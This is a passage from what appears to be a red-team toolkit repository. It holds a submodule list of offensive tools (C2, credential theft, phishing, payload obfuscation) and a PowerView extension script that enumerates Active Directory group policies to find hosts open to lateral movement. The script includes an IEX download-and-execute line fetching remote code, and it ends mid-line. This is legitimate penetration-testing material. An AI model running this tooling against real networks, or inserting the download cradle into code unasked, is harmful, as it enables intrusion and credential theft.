"Reconnaissance/People/PyHunter"] 92 | path = Reconnaissance/People/PyHunter 93 | url = https://github.com/VonStruddle/PyHunter.git 94 | [submodule "Reconnaissance/Technology/DNS/Anubis"] 95 | path = Reconnaissance/Technology/DNS/Anubis 96 | url = https://github.com/jonluca/Anubis.git 97 | [submodule "Reconnaissance/Technology/DNS/blacksheepwall"] 98 | path = Reconnaissance/Technology/DNS/blacksheepwall 99 | url = https://github.com/tomsteele/blacksheepwall.git 100 | [submodule "Reconnaissance/Technology/DNS/dnscan"] 101 | path = Reconnaissance/Technology/DNS/dnscan 102 | url = https://github.com/rbsec/dnscan.git 103 | [submodule "Reconnaissance/Technology/DNS/Sublist3r"] 104 | path = Reconnaissance/Technology/DNS/Sublist3r 105 | url = https://github.com/aboul3la/Sublist3r.git 106 | [submodule "Initial_access/Payload_generation/Invoke-CradleCrafter"] 107 | path = Initial_access/Payload_generation/Invoke-CradleCrafter 108 | url = https://github.com/danielbohannon/Invoke-CradleCrafter.git 109 | [submodule "Initial_access/Payload_generation/Invoke-Obfuscation"] 110 | path = Initial_access/Payload_generation/Invoke-Obfuscation 111 | url = https://github.com/danielbohannon/Invoke-Obfuscation.git 112 | [submodule "Command_and_control/WMImplant"] 113 | path = Command_and_control/WMImplant 114 | url = https://github.com/ChrisTruncer/WMImplant.git 115 | [submodule "Lateral_movement/WMIOps"] 116 | path = Lateral_movement/WMIOps 117 | url = https://github.com/ChrisTruncer/WMIOps.git 118 | [submodule "Initial_access/Payload_generation/Veil"] 119 | path = Initial_access/Payload_generation/Veil 120 | url = https://github.com/Veil-Framework/Veil.git 121 | [submodule "Command_and_control/Cobalt_strike/Aggressor/Aggressor-scripts"] 122 | path = Command_and_control/Cobalt_strike/Aggressor/Aggressor-scripts 123 | url = https://github.com/Und3rf10w/Aggressor-scripts.git 124 | [submodule "Command_and_control/Cobalt_strike/Aggressor/AggressorScripts"] 125 | path = 
Command_and_control/Cobalt_strike/Aggressor/AggressorScripts 126 | url = https://github.com/harleyQu1nn/AggressorScripts.git 127 | [submodule "Command_and_control/Cobalt_strike/Aggressor/bluescreenofjeff"] 128 | path = Command_and_control/Cobalt_strike/Aggressor/bluescreenofjeff 129 | url = https://github.com/bluscreenofjeff/AggressorScripts.git 130 | [submodule "Command_and_control/Cobalt_strike/Aggressor/persistence-aggressor-script"] 131 | path = Command_and_control/Cobalt_strike/Aggressor/persistence-aggressor-script 132 | url = https://github.com/ZonkSec/persistence-aggressor-script.git 133 | [submodule "Command_and_control/Empire"] 134 | path = Command_and_control/Empire 135 | url = https://github.com/EmpireProject/Empire.git 136 | [submodule "Lateral_movement/mimikatz"] 137 | path = Lateral_movement/mimikatz 138 | url = https://github.com/gentilkiwi/mimikatz.git 139 | [submodule "Command_and_control/trevorc2"] 140 | path = Command_and_control/trevorc2 141 | url = https://github.com/trustedsec/trevorc2.git 142 | [submodule "Establish_foothold/UACME"] 143 | path = Establish_foothold/UACME 144 | url = https://github.com/darkoperator/UACME.git 145 | [submodule "Establish_foothold/PowerLurk"] 146 | path = Establish_foothold/PowerLurk 147 | url = https://github.com/Sw4mpf0x/PowerLurk.git 148 | [submodule "Lateral_movement/KeeThief"] 149 | path = Lateral_movement/KeeThief 150 | url = https://github.com/HarmJ0y/KeeThief.git 151 | [submodule "Initial_access/subjack"] 152 | path = Initial_access/subjack 153 | url = https://github.com/haccer/subjack.git 154 | [submodule "Initial_access/Phishing/gophish"] 155 | path = Initial_access/Phishing/gophish 156 | url = https://github.com/gophish/gophish.git 157 | [submodule "Initial_access/Phishing/social-engineer-toolkit"] 158 | path = Initial_access/Phishing/social-engineer-toolkit 159 | url = https://github.com/trustedsec/social-engineer-toolkit.git 160 | [submodule "Initial_access/Phishing/FiercePhish"] 161 | path = 
Initial_access/Phishing/FiercePhish 162 | url = https://github.com/Raikia/FiercePhish.git 163 | [submodule "References/SadProcessorCheats"] 164 | path = References/SadProcessorCheats 165 | url = https://github.com/SadProcessor/Cheats.git 166 | [submodule "Lateral_movement/red-team-scripts"] 167 | path = Lateral_movement/red-team-scripts 168 | url = https://github.com/threatexpress/red-team-scripts.git 169 | [submodule "Lateral_movement/mimikittenz"] 170 | path = Lateral_movement/mimikittenz 171 | url = https://github.com/putterpanda/mimikittenz.git 172 | [submodule "Reconnaissance/Technology/GitLoot"] 173 | path = Reconnaissance/Technology/GitLoot 174 | url = https://github.com/0xdade/GitLoot.git 175 | [submodule "Initial_access/Payload_generation/macro_pack"] 176 | path = Initial_access/Payload_generation/macro_pack 177 | url = https://github.com/sevagas/macro_pack.git 178 | [submodule "Initial_access/Payload_generation/CheckPlease"] 179 | path = Initial_access/Payload_generation/CheckPlease 180 | url = https://github.com/Arvanaghi/CheckPlease.git 181 | [submodule "Staging/CatMyFish"] 182 | path = Staging/CatMyFish 183 | url = https://github.com/Mr-Un1k0d3r/CatMyFish.git 184 | [submodule "Initial_access/Payload_generation/DKMC"] 185 | path = Initial_access/Payload_generation/DKMC 186 | url = https://github.com/Mr-Un1k0d3r/DKMC 187 | [submodule "Lateral_movement/RedTeamPowershellScripts"] 188 | path = Lateral_movement/RedTeamPowershellScripts 189 | url = https://github.com/Mr-Un1k0d3r/RedTeamPowershellScripts.git 190 | [submodule "Lateral_movement/SCT-obfuscator"] 191 | path = Lateral_movement/SCT-obfuscator 192 | url = https://github.com/Mr-Un1k0d3r/SCT-obfuscator.git 193 | [submodule "Lateral_movement/PowerLessShell"] 194 | path = Lateral_movement/PowerLessShell 195 | url = https://github.com/Mr-Un1k0d3r/PowerLessShell.git 196 | [submodule "Command_and_control/Cobalt_strike/Aggressor/ramen0x3f"] 197 | path = Command_and_control/Cobalt_strike/Aggressor/ramen0x3f 
198 | url = https://github.com/ramen0x3f/AggressorScripts.git 199 | [submodule "Staging/EvilURL"] 200 | path = Staging/EvilURL 201 | url = https://github.com/UndeadSec/EvilURL.git 202 | [submodule "Reconnaissance/Technology/truffleHog"] 203 | path = Reconnaissance/Technology/truffleHog 204 | url = https://github.com/dxa4481/truffleHog.git 205 | [submodule "Command_and_control/Cobalt_strike/external_c2_framework"] 206 | path = Command_and_control/Cobalt_strike/external_c2_framework 207 | url = https://github.com/Und3rf10w/external_c2_framework.git 208 | [submodule "Command_and_control/Cobalt_strike/ExternalC2"] 209 | path = Command_and_control/Cobalt_strike/ExternalC2 210 | url = https://github.com/ryhanson/ExternalC2.git 211 | [submodule "Initial_access/Phishing/phishery"] 212 | path = Initial_access/Phishing/phishery 213 | url = https://github.com/ryhanson/phishery.git 214 | [submodule "Command_and_control/WSC2"] 215 | path = Command_and_control/WSC2 216 | url = https://github.com/Arno0x/WSC2 217 | [submodule "Lateral_movement/Invoke-PSImage"] 218 | path = Lateral_movement/Invoke-PSImage 219 | url = https://github.com/peewpw/Invoke-PSImage.git 220 | [submodule "Initial_access/Phishing/ReelPhish"] 221 | path = Initial_access/Phishing/ReelPhish 222 | url = https://github.com/fireeye/ReelPhish.git 223 | [submodule "Command_and_control/c2"] 224 | path = Command_and_control/c2 225 | url = https://github.com/averagesecurityguy/c2.git 226 | [submodule "Staging/Red-Team-Infrastructure-Wiki"] 227 | path = Staging/Red-Team-Infrastructure-Wiki 228 | url = https://github.com/bluscreenofjeff/Red-Team-Infrastructure-Wiki.git 229 | [submodule "Staging/Red-Baron"] 230 | path = Staging/Red-Baron 231 | url = https://github.com/Coalfire-Research/Red-Baron.git 232 | [submodule "Reconnaissance/Frameworks/spiderfoot"] 233 | path = Reconnaissance/Frameworks/spiderfoot 234 | url = https://github.com/smicallef/spiderfoot.git 235 | [submodule "Reconnaissance/Frameworks/recon-ng"] 236 | 
path = Reconnaissance/Frameworks/recon-ng 237 | url = https://bitbucket.org/LaNMaSteR53/recon-ng.git 238 | [submodule "Reconnaissance/FOCA"] 239 | path = Reconnaissance/FOCA 240 | url = https://github.com/ElevenPaths/FOCA.git 241 | [submodule "Lateral_movement/3snake"] 242 | path = Lateral_movement/3snake 243 | url = https://github.com/blendin/3snake.git 244 | [submodule "Initial_access/Payload_generation/luckystrike"] 245 | path = Initial_access/Payload_generation/luckystrike 246 | url = https://github.com/curi0usJack/luckystrike.git 247 | [submodule "Lateral_movement/ntdsxtract"] 248 | path = Lateral_movement/ntdsxtract 249 | url = https://github.com/csababarta/ntdsxtract.git 250 | [submodule "Lateral_movement/mimipenguin"] 251 | path = Lateral_movement/mimipenguin 252 | url = https://github.com/ahhh/mimipenguin.git 253 | [submodule "Staging/catphish"] 254 | path = Staging/catphish 255 | url = https://github.com/ring0lab/catphish.git 256 | [submodule "Staging/Lazy-RedTeamer-Scripts"] 257 | path = Staging/Lazy-RedTeamer-Scripts 258 | url = https://github.com/yeyintminthuhtut/Lazy-RedTeamer-Scripts.git 259 | [submodule "Lateral_movement/Java_deserial/java-deserialization-exploits"] 260 | path = Lateral_movement/Java_deserial/java-deserialization-exploits 261 | url = https://github.com/Coalfire-Research/java-deserialization-exploits.git 262 | [submodule "Initial_access/Payload_generation/SharpShooter"] 263 | path = Initial_access/Payload_generation/SharpShooter 264 | url = https://github.com/mdsecactivebreach/SharpShooter.git 265 | [submodule "Lateral_movement/Internal-Monologue"] 266 | path = Lateral_movement/Internal-Monologue 267 | url = https://github.com/eladshamir/Internal-Monologue.git 268 | [submodule "Lateral_movement/Java_deserial/Java-Deserialization-Cheat-Sheet"] 269 | path = Lateral_movement/Java_deserial/Java-Deserialization-Cheat-Sheet 270 | url = https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet.git 271 | [submodule 
"Initial_access/Probable-Wordlists"] 272 | path = Initial_access/Probable-Wordlists 273 | url = https://github.com/berzerk0/Probable-Wordlists.git 274 | [submodule "Lateral_movement/DSInternals"] 275 | path = Lateral_movement/DSInternals 276 | url = https://github.com/MichaelGrafnetter/DSInternals.git 277 | [submodule "Lateral_movement/PowerSploitDev"] 278 | path = Lateral_movement/PowerSploitDev 279 | url = https://github.com/PowerShellMafia/PowerSploit.git 280 | [submodule "Initial_access/UltimateAppLockerByPassList"] 281 | path = Initial_access/UltimateAppLockerByPassList 282 | url = https://github.com/api0cradle/UltimateAppLockerByPassList 283 | [submodule "Initial_access/Federated_services/CredKing"] 284 | path = Initial_access/Federated_services/CredKing 285 | url = https://github.com/ustayready/CredKing.git 286 | [submodule "Labs/Invoke-UserSimulator"] 287 | path = Labs/Invoke-UserSimulator 288 | url = https://github.com/ubeeri/Invoke-UserSimulator.git 289 | [submodule "ClickOnceGenerator"] 290 | path = ClickOnceGenerator 291 | url = https://github.com/Mr-Un1k0d3r/ClickOnceGenerator.git 292 | [submodule "Initial_access/Payload_generation/ClickOnceGenerator"] 293 | path = Initial_access/Payload_generation/ClickOnceGenerator 294 | url = https://github.com/Mr-Un1k0d3r/ClickOnceGenerator.git 295 | [submodule "Labs/Invoke-ADLabDeployer"] 296 | path = Labs/Invoke-ADLabDeployer 297 | url = https://github.com/outflanknl/Invoke-ADLabDeployer.git 298 | [submodule "Lateral_movement/ShellIntelScripts"] 299 | path = Lateral_movement/ShellIntelScripts 300 | url = https://github.com/Shellntel/scripts.git 301 | [submodule "Initial_access/PoSHBypass"] 302 | path = Initial_access/PoSHBypass 303 | url = https://github.com/davehardy20/PoSHBypass.git 304 | [submodule "Reconnaissance/Technology/goGetBucket"] 305 | path = Reconnaissance/Technology/goGetBucket 306 | url = https://github.com/glen-mac/goGetBucket.git 307 | [submodule 
"Lateral_movement/d8072d730b24fbae6ffe3aed8ca9c407"] 308 | path = Lateral_movement/d8072d730b24fbae6ffe3aed8ca9c407 309 | url = https://gist.github.com/d8072d730b24fbae6ffe3aed8ca9c407.git 310 | [submodule "Lateral_movement/credgrap_ie_edge"] 311 | path = Lateral_movement/credgrap_ie_edge 312 | url = https://github.com/HanseSecure/credgrap_ie_edge.git 313 | [submodule "Initial_access/aws_pwn"] 314 | path = Initial_access/aws_pwn 315 | url = https://github.com/dagrz/aws_pwn.git 316 | [submodule "Reconnaissance/People/prowl"] 317 | path = Reconnaissance/People/prowl 318 | url = https://github.com/nettitude/prowl 319 | [submodule "Command_and_control/ideas/f468d34e81795239a8f8bac03646cf59"] 320 | path = Command_and_control/ideas/f468d34e81795239a8f8bac03646cf59 321 | url = https://gist.github.com/f468d34e81795239a8f8bac03646cf59.git 322 | [submodule "Initial_access/31b2bbc5f129650c2a67bb40d14282ab"] 323 | path = Initial_access/31b2bbc5f129650c2a67bb40d14282ab 324 | url = https://gist.github.com/31b2bbc5f129650c2a67bb40d14282ab.git 325 | [submodule "Initial_access/example-hta"] 326 | path = Initial_access/example-hta 327 | url = https://gist.github.com/31b2bbc5f129650c2a67bb40d14282ab.git 328 | [submodule "Staging/htaccess"] 329 | path = Staging/htaccess 330 | url = https://gist.github.com/leoloobeek/bc82e68af027b2f876527406c04ae68d 331 | [submodule "Reconnaissance/People/LinkedInScrape-js"] 332 | path = Reconnaissance/People/LinkedInScrape-js 333 | url = https://gist.github.com/d9b7f380336b298c2b744de389f3c47d.git 334 | [submodule "Staging/mkhtaccess_red"] 335 | path = Staging/mkhtaccess_red 336 | url = https://github.com/violentlydave/mkhtaccess_red.git 337 | [submodule "Reconnaissance/Frameworks/omnibus"] 338 | path = Reconnaissance/Frameworks/omnibus 339 | url = https://github.com/InQuest/omnibus.git 340 | [submodule "Initial_access/poc-iqy"] 341 | path = Initial_access/poc-iqy 342 | url = https://gist.github.com/Mr-Un1k0d3r/4ed3e3e0416fbbd1fd015119359eb961 343 | 
[submodule "Initial_access/poc-iqy-remote"] 344 | path = Initial_access/poc-iqy-remote 345 | url = https://gist.github.com/Mr-Un1k0d3r/abdcf16ebcef5842c7f79ee6686271e7 346 | [submodule "Initial_access/Targeting/office365userenum"] 347 | path = Initial_access/Targeting/office365userenum 348 | url = https://bitbucket.org/grimhacker/office365userenum.git 349 | [submodule "Lateral_movement/GhostPack/SharpDPAPI"] 350 | path = Lateral_movement/GhostPack/SharpDPAPI 351 | url = https://github.com/GhostPack/SharpDPAPI.git 352 | [submodule "Lateral_movement/GhostPack/Seatbelt"] 353 | path = Lateral_movement/GhostPack/Seatbelt 354 | url = https://github.com/GhostPack/Seatbelt.git 355 | [submodule "Lateral_movement/GhostPack/SharpUp"] 356 | path = Lateral_movement/GhostPack/SharpUp 357 | url = https://github.com/GhostPack/SharpUp.git 358 | [submodule "Lateral_movement/GhostPack/SharpDump"] 359 | path = Lateral_movement/GhostPack/SharpDump 360 | url = https://github.com/GhostPack/SharpDump.git 361 | [submodule "Lateral_movement/GhostPack/SafetyKatz"] 362 | path = Lateral_movement/GhostPack/SafetyKatz 363 | url = https://github.com/GhostPack/SafetyKatz.git 364 | [submodule "Lateral_movement/GhostPack/SharpWMI"] 365 | path = Lateral_movement/GhostPack/SharpWMI 366 | url = https://github.com/GhostPack/SharpWMI.git 367 | [submodule "Lateral_movement/GhostPack/SharpRoast"] 368 | path = Lateral_movement/GhostPack/SharpRoast 369 | url = https://github.com/GhostPack/SharpRoast.git 370 | [submodule "Labs/atomic-red-team"] 371 | path = Labs/atomic-red-team 372 | url = https://github.com/redcanaryco/atomic-red-team.git 373 | [submodule "Reconnaissance/Technology/spoofcheck"] 374 | path = Reconnaissance/Technology/spoofcheck 375 | url = https://github.com/BishopFox/spoofcheck 376 | [submodule "Initial_access/SigThief"] 377 | path = Initial_access/SigThief 378 | url = https://github.com/secretsquirrel/SigThief.git 379 | [submodule "Initial_access/metatwin"] 380 | path = 
Initial_access/metatwin 381 | url = https://github.com/threatexpress/metatwin 382 | [submodule "Initial_access/PSAmsi"] 383 | path = Initial_access/PSAmsi 384 | url = https://github.com/cobbr/PSAmsi 385 | [submodule "Initial_access/SpookFlare"] 386 | path = Initial_access/SpookFlare 387 | url = https://github.com/hlldz/SpookFlare.git 388 | [submodule "Initial_access/Phishing/PhishingPretexts"] 389 | path = Initial_access/Phishing/PhishingPretexts 390 | url = https://github.com/L4bF0x/PhishingPretexts 391 | [submodule "Command_and_control/merlin"] 392 | path = Command_and_control/merlin 393 | url = https://github.com/Ne0nd0g/merlin 394 | [submodule "Staging/DomainFrontDiscover"] 395 | path = Staging/DomainFrontDiscover 396 | url = https://github.com/peewpw/DomainFrontDiscover 397 | [submodule "References/Red-Teaming-Toolkit"] 398 | path = References/Red-Teaming-Toolkit 399 | url = https://github.com/infosecn1nja/Red-Teaming-Toolkit 400 | [submodule "Reconnaissance/People/GatherContacts"] 401 | path = Reconnaissance/People/GatherContacts 402 | url = https://github.com/clr2of8/GatherContacts.git 403 | -------------------------------------------------------------------------------- /Lateral_movement/PowerView-with-RemoteAccessPolicyEnumeration.ps1: -------------------------------------------------------------------------------- 1 | #requires -version 2 2 | 3 | # PowerView extensions for enumerating remote access policies through group policy. 4 | # William Knowles (@william_knows) and Jon Cave (@joncave) 5 | # For more details, see: https://labs.mwrinfosecurity.com/blog/enumerating-remote-access-policies-through-gpo 6 | 7 | # The following PowerView extensions were based on the code from commit be932ce 8 | # Obtain a copy of this ... 
9 | IEX (New-Object Net.Webclient).DownloadString("https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/be932ce2be3e2a574c403f1635057029e176f858/Recon/PowerView.ps1") 10 | 11 | function Find-ComputersWithRemoteAccessPolicies { 12 | <# 13 | .SYNOPSIS 14 | 15 | Returns the DNS hostnames of computers with remote access policies relevant to lateral movement. 16 | 17 | .DESCRIPTION 18 | 19 | Checks GPO for settings which deal with remote access policies relevant to lateral movement 20 | (e.g., "EnableLUA" and "LocalAccountTokenFilterPolicy"). The OUs to which these GPOs are applied 21 | are then identified, and then the computer objects from each are retrieved. Note that this only 22 | retrieves computer objects who have had the relevent registry keys set through group policy. 23 | 24 | .PARAMETER Domain 25 | 26 | Specifies the domain to use for the query, defaults to the current domain. 27 | 28 | .PARAMETER SearchBase 29 | 30 | The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local" 31 | Useful for OU queries. 32 | 33 | .PARAMETER SearchScope 34 | 35 | Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree). 36 | 37 | .PARAMETER Server 38 | 39 | Specifies an Active Directory server (domain controller) to bind to. 40 | 41 | .PARAMETER ResultPageSize 42 | 43 | Specifies the PageSize to set for the LDAP searcher object. 44 | 45 | .PARAMETER ServerTimeLimit 46 | 47 | Specifies the maximum amount of time the server spends searching. Default of 120 seconds. 48 | 49 | .PARAMETER Credential 50 | 51 | A [Management.Automation.PSCredential] object of alternate credentials 52 | for connection to the target domain. 53 | 54 | .EXAMPLE 55 | 56 | PS C:\> Find-ComputersWithRemoteAccessPolicies 57 | 58 | Returns the DNS hostnames for computer objects that have GPOs applied which may enable lateral movement. 
59 | 60 | .EXAMPLE 61 | 62 | PS C:\> Find-ComputersWithRemoteAccessPolicies -Domain dev.testlab.local 63 | 64 | Returns the DNS hostnames for computer objects that have GPOs applied which may enable lateral movement. Limit to a particular domain. 65 | 66 | .EXAMPLE 67 | 68 | PS C:\> Find-ComputersWithRemoteAccessPolicies -SearchBase "OU=secret,DC=testlab,DC=local" 69 | 70 | Returns the DNS hostnames for computer objects that have GPOs applied which may enable lateral movement. Limit to a particular organisational unit. 71 | 72 | #> 73 | 74 | [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] 75 | [CmdletBinding()] 76 | Param( 77 | [ValidateNotNullOrEmpty()] 78 | [String] 79 | $Domain, 80 | 81 | [ValidateNotNullOrEmpty()] 82 | [Alias('ADSPath')] 83 | [String] 84 | $SearchBase, 85 | 86 | [ValidateSet('Base', 'OneLevel', 'Subtree')] 87 | [String] 88 | $SearchScope = 'Subtree', 89 | 90 | [ValidateNotNullOrEmpty()] 91 | [Alias('DomainController')] 92 | [String] 93 | $Server, 94 | 95 | [ValidateRange(1, 10000)] 96 | [Int] 97 | $ResultPageSize = 200, 98 | 99 | [ValidateRange(1, 10000)] 100 | [Int] 101 | $ServerTimeLimit, 102 | 103 | [Management.Automation.PSCredential] 104 | [Management.Automation.CredentialAttribute()] 105 | $Credential = [Management.Automation.PSCredential]::Empty 106 | 107 | ) 108 | 109 | BEGIN { 110 | $SearcherArguments = @{} 111 | if ($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = $Domain } 112 | if ($PSBoundParameters['LDAPFilter']) { $SearcherArguments['LDAPFilter'] = $Domain } 113 | if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server } 114 | if ($PSBoundParameters['SearchBase']) { $SearcherArguments['SearchBase'] = $SearchBase} 115 | if ($PSBoundParameters['SearchScope']) { $SearcherArguments['SearchScope'] = $SearchScope} 116 | if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize } 117 | if ($PSBoundParameters['ServerTimeLimit']) { 
$SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit } 118 | if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential } 119 | 120 | } 121 | 122 | PROCESS { 123 | 124 | $ComputerObjectsWithRemoteAccessPolicies = New-Object PSObject 125 | $ComputerObjectsWithRemoteAccessPolicies | Add-Member NoteProperty EnableLUA (New-Object System.Collections.Generic.List[System.Object]) 126 | $ComputerObjectsWithRemoteAccessPolicies | Add-Member NoteProperty FilterAdministratorToken (New-Object System.Collections.Generic.List[System.Object]) 127 | $ComputerObjectsWithRemoteAccessPolicies | Add-Member NoteProperty LocalAccountTokenFilterPolicy (New-Object System.Collections.Generic.List[System.Object]) 128 | $ComputerObjectsWithRemoteAccessPolicies | Add-Member NoteProperty SeDenyNetworkLogonRight (New-Object System.Collections.Generic.List[System.Object]) 129 | $ComputerObjectsWithRemoteAccessPolicies | Add-Member NoteProperty SeDenyRemoteInteractiveLogonRight (New-Object System.Collections.Generic.List[System.Object]) 130 | 131 | $gpoSearchArguments = @{} 132 | $gpoSearchArguments = $gpoSearchArguments + $SearcherArguments 133 | $gpoSearchArguments.Remove("SearchBase") 134 | $gpoSearchArguments.Remove("SearchScope") 135 | # NOTE: SearchBase is removed here, as we do not wish it to be applied to the initial call to Get-DomainGPORemoteAccessPolicy 136 | # and instead for the search to be conducted across the domain 137 | $RemoteAccessPolicies = Get-DomainGPORemoteAccessPolicy @gpoSearchArguments 138 | 139 | $RemoteAccessPolicies.PSObject.Properties | ForEach-Object { 140 | $policy = $_.Name # EnableLUA, etc 141 | foreach ($guid in $RemoteAccessPolicies.$policy) { 142 | # set arguments for OU search (reading $SearchBase to limit the scope) 143 | $ouSearchArguments = @{} 144 | $ouSearchArguments = $ouSearchArguments + $SearcherArguments 145 | $ouSearchArguments['GPLink'] = $guid 146 | Get-DomainOU @ouSearchArguments | ForEach-Object { 147 | 
$compSearchArguments = @{} 148 | $compSearchArguments = $compSearchArguments + $SearcherArguments 149 | $compSearchArguments['SearchBase'] = $_.distinguishedname 150 | $OUComputers = Get-DomainComputer @compSearchArguments 151 | $OUComputers | ForEach-Object { 152 | if ($ComputerObjectsWithRemoteAccessPolicies.$policy -notcontains $_.dnshostname) { $ComputerObjectsWithRemoteAccessPolicies.$policy += $_.dnshostname } 153 | } 154 | } 155 | } 156 | } 157 | } 158 | 159 | END { 160 | return $ComputerObjectsWithRemoteAccessPolicies 161 | } 162 | } 163 | 164 | function Get-DomainGPORemoteAccessPolicy { 165 | <# 166 | .SYNOPSIS 167 | 168 | Enumerates GPOs that control settings that deal with remote access policies. 169 | 170 | .DESCRIPTION 171 | 172 | Checks GPO for five different remote access policies. Three which relate to User 173 | Account Control (UAC) and two which relate to User Rights Assignment (URA). 174 | The three UAC policies are: 175 | (1) "EnableLUA" which controls "Admin Approval Mode" for the local administrator group. 176 | When set to 0 UAC is disabled. This setting can be controlled by group policy directly 177 | and is stored in "GptTmpl.inf". 178 | (2) "FilterAdministratorToken" controls "Admin Approval Mode" for the RID 500 account. 179 | When set to 0 remote connections for the RID 500 account will be granted a high 180 | integrity token. This setting is disabled by default. This setting can be controlled 181 | by group policy directly and is stored in "GptTmpl.inf". 182 | (3) "LocalAccountTokenFilterPolicy" controls token integrity for remote connections. 183 | When set to 1 all remote connections for local users in the local administrator group 184 | will be granted a high integrity token. This setting can only be set through a custom 185 | registry key and is stored in "Registry.xml". 186 | The order of precedence for the above three UAC commands is: EnableLUA, 187 | LocalAccountTokenFilterPolicy, FilterAdministratorToken. 
For example, for 188 | FilterAdministratorToken to have an effect EnableLUA would need to be set to 1, and 189 | LocalAccountTokenFilterPolicy to 0. 190 | The two URA policies are: 191 | (4) and (5) "SeDenyNetworkLogonRight" and "SeDenyRemoteInteractiveLogonRight" are 192 | checked to see if they include the SID of the built-in Administrators group. If they 193 | do, any member of this group can not be used to perform network or remote interactive 194 | authentication against the computer object on which they are configured. 195 | 196 | .PARAMETER Identity 197 | 198 | A display name (e.g. 'Test GPO'), DistinguishedName (e.g. 'CN={F260B76D-55C8-46C5-BEF1-9016DD98E272},CN=Policies,CN=System,DC=testlab,DC=local'), 199 | GUID (e.g. '10ec320d-3111-4ef4-8faf-8f14f4adc789'), or GPO name (e.g. '{F260B76D-55C8-46C5-BEF1-9016DD98E272}'). Wildcards accepted. 200 | 201 | .PARAMETER Domain 202 | 203 | Specifies the domain to use for the query, defaults to the current domain. 204 | 205 | .PARAMETER LDAPFilter 206 | 207 | Specifies an LDAP query string that is used to filter Active Directory objects. 208 | 209 | .PARAMETER SearchBase 210 | 211 | The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local" 212 | Useful for OU queries. 213 | 214 | .PARAMETER Server 215 | 216 | Specifies an Active Directory server (domain controller) to bind to. 217 | 218 | .PARAMETER SearchScope 219 | 220 | Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree). 221 | 222 | .PARAMETER ResultPageSize 223 | 224 | Specifies the PageSize to set for the LDAP searcher object. 225 | 226 | .PARAMETER ServerTimeLimit 227 | 228 | Specifies the maximum amount of time the server spends searching. Default of 120 seconds. 229 | 230 | .PARAMETER Credential 231 | 232 | A [Management.Automation.PSCredential] object of alternate credentials 233 | for connection to the target domain. 
234 | 235 | .EXAMPLE 236 | 237 | Get-DomainGPORemoteAccessPolicy 238 | 239 | Returns an object where the key is the remote access policy, and the value is 240 | a list of GPOs which set the policy. 241 | 242 | #> 243 | 244 | [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] 245 | [CmdletBinding()] 246 | Param( 247 | [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] 248 | [Alias('DistinguishedName', 'SamAccountName', 'Name')] 249 | [String[]] 250 | $Identity, 251 | 252 | [ValidateNotNullOrEmpty()] 253 | [String] 254 | $Domain, 255 | 256 | [ValidateNotNullOrEmpty()] 257 | [Alias('Filter')] 258 | [String] 259 | $LDAPFilter, 260 | 261 | [ValidateNotNullOrEmpty()] 262 | [Alias('ADSPath')] 263 | [String] 264 | $SearchBase, 265 | 266 | [ValidateSet('Base', 'OneLevel', 'Subtree')] 267 | [String] 268 | $SearchScope = 'Subtree', 269 | 270 | [ValidateNotNullOrEmpty()] 271 | [Alias('DomainController')] 272 | [String] 273 | $Server, 274 | 275 | [ValidateRange(1, 10000)] 276 | [Int] 277 | $ResultPageSize = 200, 278 | 279 | [ValidateRange(1, 10000)] 280 | [Int] 281 | $ServerTimeLimit, 282 | 283 | [Management.Automation.PSCredential] 284 | [Management.Automation.CredentialAttribute()] 285 | $Credential = [Management.Automation.PSCredential]::Empty 286 | ) 287 | 288 | BEGIN { 289 | $SearcherArguments = @{} 290 | if ($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = $Domain } 291 | if ($PSBoundParameters['LDAPFilter']) { $SearcherArguments['LDAPFilter'] = $Domain } 292 | if ($PSBoundParameters['SearchBase']) { $SearcherArguments['SearchBase'] = $SearchBase } 293 | if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server } 294 | if ($PSBoundParameters['SearchScope']) { $SearcherArguments['SearchScope'] = $SearchScope } 295 | if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize } 296 | if ($PSBoundParameters['ServerTimeLimit']) { 
$SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit } 297 | if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential } 298 | 299 | $ConvertArguments = @{} 300 | if ($PSBoundParameters['Domain']) { $ConvertArguments['Domain'] = $Domain } 301 | if ($PSBoundParameters['Server']) { $ConvertArguments['Server'] = $Server } 302 | if ($PSBoundParameters['Credential']) { $ConvertArguments['Credential'] = $Credential } 303 | 304 | $SplitOption = [System.StringSplitOptions]::RemoveEmptyEntries 305 | } 306 | 307 | PROCESS { 308 | if ($PSBoundParameters['Identity']) { $SearcherArguments['Identity'] = $Identity } 309 | 310 | $RemoteAccessPolicies = New-Object PSObject 311 | $RemoteAccessPolicies | Add-Member NoteProperty EnableLUA (New-Object System.Collections.Generic.List[System.Object]) 312 | $RemoteAccessPolicies | Add-Member NoteProperty FilterAdministratorToken (New-Object System.Collections.Generic.List[System.Object]) 313 | $RemoteAccessPolicies | Add-Member NoteProperty LocalAccountTokenFilterPolicy (New-Object System.Collections.Generic.List[System.Object]) 314 | $RemoteAccessPolicies | Add-Member NoteProperty SeDenyNetworkLogonRight (New-Object System.Collections.Generic.List[System.Object]) 315 | $RemoteAccessPolicies | Add-Member NoteProperty SeDenyRemoteInteractiveLogonRight (New-Object System.Collections.Generic.List[System.Object]) 316 | 317 | # get every GPO from the specified domain 318 | Get-DomainGPO @SearcherArguments | ForEach-Object { 319 | 320 | $GPOdisplayName = $_.displayname 321 | $GPOname = $_.name 322 | $GPOPath = $_.gpcfilesyspath 323 | 324 | # EnableLUA and FilterAdministratorToken check via GptTmpl.inf 325 | $ParseArgs = @{ 'GptTmplPath' = 